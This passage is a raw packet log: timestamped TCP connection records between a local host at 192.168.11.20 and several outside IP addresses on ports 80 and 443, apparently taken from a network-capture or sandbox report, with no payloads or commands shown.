                                                                                                                                                    Nov 29, 2021 14:11:15.535469055 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535516977 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535597086 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.535842896 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.535873890 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536156893 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.536303997 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536333084 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536345959 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536364079 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536487103 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.536627054 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536657095 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536670923 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536680937 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536698103 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536819935 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.536951065 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536982059 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.536995888 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.537064075 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.537091970 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.537203074 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.541434050 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.541476011 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:16.758913994 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.893157005 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:16.893497944 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.894920111 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.895016909 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.895191908 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.037909031 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.038265944 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.038408995 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.041656971 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.041728973 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.041996002 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.042098045 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.042115927 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180084944 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180149078 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180191994 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180319071 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180354118 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180480957 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180556059 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180682898 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180744886 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180788040 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180915117 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181092024 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181330919 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181499004 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.251446009 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251508951 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251545906 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251768112 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.251816988 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.321858883 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.321930885 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.321974039 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322005033 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322036028 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322066069 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322063923 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322098017 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322166920 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322223902 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322395086 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.331252098 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.331502914 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.331631899 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.397542953 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454088926 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454149008 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454231024 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454267979 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454329014 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454366922 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454405069 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454464912 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454500914 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454539061 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454591990 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454627991 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463531017 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463596106 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463654041 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463690996 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463756084 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463793993 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463891983 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467701912 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467839956 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467864037 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.467947006 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:22.257766008 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.272573948 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.272794962 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274576902 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274683952 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274826050 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289438963 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289494038 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289527893 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289649010 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289707899 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289731026 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289789915 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289844990 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289896965 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289930105 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289972067 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290062904 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290071011 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290071964 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.290179014 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304465055 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304512978 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304661036 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304713011 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304734945 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304858923 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304896116 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.305176020 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.305212975 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.319791079 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.319458961 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.477432966 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.477590084 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479099035 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479124069 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479371071 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.637892962 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.638046026 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.638103008 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.638290882 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.640254974 CET8049851172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.640393972 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.640578032 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.798952103 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799045086 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799067974 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799087048 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799105883 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799201012 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799252987 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799299955 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799494982 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799652100 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.804884911 CET8049851172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.804919958 CET8049851172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.805155993 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.805203915 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.961586952 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961600065 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961606979 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961613894 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961621046 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961628914 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961636066 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961642981 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961649895 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961658001 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961678982 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.961875916 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.961903095 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.961951017 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.962202072 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.962306023 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.966234922 CET8049851172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126373053 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126441002 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126485109 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126526117 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126565933 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126606941 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126647949 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126688004 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126729012 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126769066 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126811028 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126852036 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126893044 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126933098 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:28.126974106 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:37.863662958 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.022057056 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.022289038 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.023766994 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.023906946 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.182884932 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.182924986 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.183142900 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.183286905 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.183460951 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.341651917 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341701984 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341733932 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341769934 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341826916 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341861010 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.341865063 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.341988087 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.342165947 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.342295885 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.342338085 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.342427015 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.342514038 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.342545033 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.342636108 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.342693090 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.342869997 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.343054056 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.499898911 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.499979019 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.499998093 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.500118017 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.500194073 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.500343084 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.500529051 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.500633955 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.500659943 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.500755072 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.500910044 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.501050949 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.501224041 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.501256943 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.501321077 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.501578093 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:38.501630068 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.501868010 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.501975060 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502070904 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502293110 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502362013 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502474070 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502590895 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502712011 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.502897024 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503021002 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503139019 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503633022 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503664970 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503885984 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.503917933 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.504121065 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.504286051 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.660731077 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.660743952 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.660845041 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.661060095 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.661072016 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.661181927 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.661931992 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.662390947 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.662580013 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.795996904 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.796051979 CET804985266.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:38.796236992 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:40.034744024 CET4985280192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:40.034965038 CET4985380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:40.198546886 CET804985366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:40.198899031 CET4985380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:40.199002028 CET4985380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:40.360325098 CET804985366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:40.430437088 CET804985366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:40.430510044 CET804985366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:40.430819988 CET4985380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:42.206408978 CET4985380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:42.367474079 CET804985366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.221472025 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.232512951 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.232764006 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.234215021 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.234293938 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.234338045 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.234421968 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.245485067 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245533943 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245589018 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245628119 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245651960 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.245758057 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245867968 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.245918036 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.245982885 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.246016979 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.246045113 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.246051073 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.246107101 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.246140003 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.246192932 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.246284008 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.246375084 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.246383905 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.246418953 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.256876945 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257126093 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257143021 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.257194996 CET804985434.102.136.180192.168.11.20
